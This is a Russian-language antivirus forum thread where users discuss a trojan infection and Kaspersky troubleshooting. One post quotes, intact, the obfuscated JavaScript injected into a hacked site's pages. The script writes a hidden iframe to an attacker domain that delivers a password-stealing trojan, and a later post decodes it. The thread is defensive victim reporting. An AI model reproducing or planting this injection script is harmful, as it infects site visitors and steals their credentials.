Перейти к содержанию

Троян с "Вечной жизнью"


Рекомендуемые сообщения

н-даа и по каким помойкам Вас носило....новье (хорошо, что это решаемо)

 

Где только не носило;)

Все это скорее всего от взломанного ПО скачанного с инета.

Ссылка на комментарий
Поделиться на другие сайты

Может и от сайта зараженного, от ПО только одну версию можно получить, а через инет только актуальные новинки.

 

P>S> Все уехало в вирлаб.

Ссылка на комментарий
Поделиться на другие сайты

Может и от сайта зараженного, от ПО только одну версию можно получить, а через инет только актуальные новинки.

Логично. На днях "взломали/украли пароли/др.варианты" мои сайты

В корневой директории и в директории форума все файлы были модифицированы добавлением к конце страницы следующего кода:

 

<script type="text/javascript">

document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u0062\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072\u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u0030\u0031\u0030\u0034\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');

</script>

 

 

И у меня еще проблема:

В C:\Documents and Settings\Admin (основной пользователь) время от времени появляется файл WIN.EXE , вирусов вроде нет, в процессы не лезет, я его удаляю, а он снова...

win.rar

 

Восстановление значка "Свернуть все окна":

Создай текстовый файл и туда скопируй:

 

[shell]

Command=2

IconFile=explorer.exe,3

[Taskbar]

Command=ToggleDesktop

 

После сохраняй как Свернуть все окна.scf

А лучше пользуйтесь WinKey+D - проще

Изменено пользователем NoAdmin
Ссылка на комментарий
Поделиться на другие сайты

Почему, это по версии касперского.

У меня KIS 7.0.0.125 de с базами от 4.04.08 8:20 - не определяет

а с базами 4.04.08 19:22 - определяет, Убедили!

Изменено пользователем NoAdmin
Ссылка на комментарий
Поделиться на другие сайты

В корневой директории и в директории форума все файлы были модифицированы добавлением к конце страницы следующего кода:

<script type="text/javascript">

document.write('\u003c\u......');

</script>

 

хм... расшифровываться как:

<iframe src=http://atomakayan*.biz*/afterftpchek/0104/index.php width=1 height=1 style="display:none"></iframe>

и грузиться в теории этот файл:

atomakayan.biz/my/load***.exe

(звездочки в код я вставил специально, что бы никто нечаянно не сделал контрл+с и контрл+в и ентер. т.е код - без них)))

 

 

файл (если верить касперу - сейчас лень было качать и ковырять) - пинч обыкновенный....

Изменено пользователем vidocq89
Ссылка на комментарий
Поделиться на другие сайты

- Пропали значки "Спам", "Не спам" в Outlook Express

 

Удаление KIS и повторная установка - результат не дали.

Изменено пользователем NoAdmin
Ссылка на комментарий
Поделиться на другие сайты

файл (если верить касперу - сейчас лень было качать и ковырять) - пинч обыкновенный....

Пинч...значит пароли тю-тю...необходимо менять.

 

baseeopiq32.dll - Trojan.Win32.SubSys.ca

Ссылка на комментарий
Поделиться на другие сайты

Пинч...значит пароли тю-тю...необходимо менять.

 

Да последнее время только этим и занимаемся! Спасибо!

 

 

- Пропали значки "Спам", "Не спам" в Outlook Express

 

Обновление KIS 7.0.0125 до 7.0.1.325 - ситуацию не исправило

Ссылка на комментарий
Поделиться на другие сайты

Обновление KIS 7.0.0125 до 7.0.1.325 - ситуацию не исправило

Добро пожаловать на форум! У меня была похожая проблема. Непомню как решил, но попропую посоетовать то, что делал я сам. Для начала Настройки-> Антиспам-> "Включить поддержку MS Outlook и т.д." и "Открывать Диспетчер писем при получении почты" галки снимаем. Далее ставим по умолчанию в панели управения почтовый клиент офис аутлук (если есть МС Офис), перезагружаемся. Потом ставим обратно галки в каспере которые сняли ранее, ставим обратно почтовый клиент по умолчанию аутлук экспресс, и запускаем его и смотрим.

Ссылка на комментарий
Поделиться на другие сайты

Добро пожаловать на форум!

Спасибо!

 

Снял птицы в KIS

Открыл Оутлук Офис - установил почтой по умолчанию

Перезагрузка ОС

Установил птицы в KIS

Открыл Оутлук Экспресс - установил почтой по умолчанию

Перезагрузил

 

Безрезультатно

 

Помогло только:

Удалить Касперского утилитой http://http://forum.kasperskyclub.ru/index...ost&id=4321 и снова установите 325ю или новее

Вопрос снят

 

Всем Спасибо

Изменено пользователем NoAdmin
Ссылка на комментарий
Поделиться на другие сайты

NoAdmin, поздравляю с решением проблемы! = ) Но ссылка которую Вы дали ведёт на главную страницу = ( Можно конкретную линку?

 

P.S. Спасибо, буду знать как лечить данную траблу в будущем = )

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • varzi_73
      Автор varzi_73
      Добрый день! подцепил троян. Как восстановить данные?
      RDesk_Backup.rar
    • user344
      Автор user344
      Здравствуйте! Недавно компьютер в простое начинает переодически нагружаться до 100%, вентиляторы начинают крутить на полную в течении 5-10 минут, только начинаешь водить мышкой по рабочему столу, то сразу же нагрузка падает до дефолтных значений. Проверял лечащай утилитой др.веб и kvrt они вирусов не нашли.
      CollectionLog-2025.06.25-21.11.zip
    • MirTa
      Автор MirTa
      Здравствуйте, вчера в два этапа  10.00 и  20.00 оказались зашифрованы почти все файлы, в том числе и архиватор, поэтому не могу сложить в архив и не могу их прикрепить, подскажите, пожалуйста, как их сюда добавить
      Important_Notice.txt Addition.txt FRST.txt
    • DonorRaboti
      Автор DonorRaboti
      Добрый день, по своей глупости скачал файл exe и запустил его после чего на компьютере появились рекламные ярлыки на рабочем столе и как будто часть сайтов с антивирусным по затормозились. Сканировал Dr.Web CureIt и KVRT, но ничего не было найдено того, что ранее не видел. Возможно, видел новый созданный профиль в Windows, подписанный как неизвестный или что-то такое и удалил его. Проверки Антивирусами ничего не выявляли, кроме пары файлов в корзине. Сам компьютер, как мне показалось, иногда подвисал, словно был загружен, но в диспетчере задач, как и в resmon ничего не выявил. На VirusTotal при проверке файла указывало на вредоносное ПО, содержащее Trojan:Win32/Wacatac.B!ml. Также заметил, что не могу попасть на сайт safezone.cc, скачивал автологер через 2 зеркало
      CollectionLog-2025.06.19-02.13.zip
    • sajithebloody
      Автор sajithebloody
      Доброго времени, касперский не может справиться с троянами в этих файлах, лечение с перезагрузкой не помогает. Не нашел детект трояна в отчетах Касперского (но это было в моменте), но нашел упоминание попадания этих файлов в исключение сразу же после установки антивиря - подозрительно. Заранее прикрепляю максимум логов, из аутологгера и uvs. 
      лог к.txt CollectionLog-2025.05.09-02.44.zip DESKTOP-LB93OSN_2025-05-09_03-17-36_v4.99.14v x64.7z
×
×
  • Создать...